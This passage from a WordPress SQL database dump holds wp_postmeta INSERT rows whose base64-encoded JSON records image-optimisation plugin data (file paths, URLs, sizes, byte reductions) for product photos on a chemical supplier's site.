ZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc3MC12ZXJ0cmVsLW1jYS1wbHVzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxOTAsInRpbWUiOjE0ODM1NzA3MjMsImlkIjoxNDIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzcwLXZlcnRyZWwtbWNhLXBsdXMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NzAtdmVydHJlbC1tY2EtcGx1cy0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc3MC12ZXJ0cmVsLW1jYS1wbHVzLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo5MywidGltZSI6MTQ4MzU3MDcyNiwiaWQiOjE0MjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NzAtdmVydHJlbC1tY2EtcGx1cy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc3MC12ZXJ0cmVsLW1jYS1wbHVzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzcwLXZlcnRyZWwtbWNhLXBsdXMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEwMCwidGltZSI6MTQ4MzU3MDcyOCwiaWQiOjE0MjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NzAtdmVydHJlbC1tY2EtcGx1cy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc3MC12ZXJ0cmVsLW1jYS1wbHVzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzcwLXZlcnRyZWwtbWNhLXBsdXMtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA3MzEsImlkIjoxNDIwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzcwLXZlcnRyZWwtbWNhLXBsdXMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NzAtdmVydHJlbC1tY2EtcGx1cy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc3MC12ZXJ0cmVsLW1jYS1wbHVzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNzM0LCJpZCI6MTQyMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc3MC12ZXJ0cmVsLW1jYS1wbHVzLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzcwLXZlcnRyZWwtbWNhLXBsdXMtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NzAtdmVydHJlbC1tY2EtcGx1cy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDczNiwiaWQiOjE0MjB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29494, 1419, 'wpfc_optimisation_reduction', '2132305'); 
INSERT INTO `wp_postmeta` VALUES (29495, 1419, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQuanBnIiwicmVkdWN0aW9uIjoyMTMxODI0LCJ0aW1lIjoxNDgzNTcwNzQ3LCJpZCI6IjE0MTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDc1MCwiaWQiOjE0MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNzUzLCJpZCI6MTQxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA3NTYsImlkIjoxNDE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNzU5LCJpZCI6MTQxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA3NjIsImlkIjoxNDE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDc2NSwiaWQiOjE0MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNzY3LCJpZCI6MTQxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA3NzAsImlkIjoxNDE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyMDEsInRpbWUiOjE0ODM1NzA3NzMsImlkIjoxNDE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMjEsInRpbWUiOjE0ODM1NzA3NzUsImlkIjoxNDE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNDgsInRpbWUiOjE0ODM1NzA3NzgsImlkIjoxNDE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzYwLWNsZWFuaW5nLWFnZW50LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNzgwLCJpZCI6MTQxOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc2MC1jbGVhbmluZy1hZ2VudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDc4MywiaWQiOjE0MTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NjAtY2xlYW5pbmctYWdlbnQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA3ODYsImlkIjoxNDE5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29496, 1418, 'wpfc_optimisation_reduction', '2165859'); 
INSERT INTO `wp_postmeta` VALUES (29497, 1418, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQuanBnIiwicmVkdWN0aW9uIjoyMTY1NDc0LCJ0aW1lIjoxNDgzNTcwNzk3LCJpZCI6IjE0MTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDgwMCwiaWQiOjE0MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwODAzLCJpZCI6MTQxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA4MDYsImlkIjoxNDE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwODEwLCJpZCI6MTQxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhl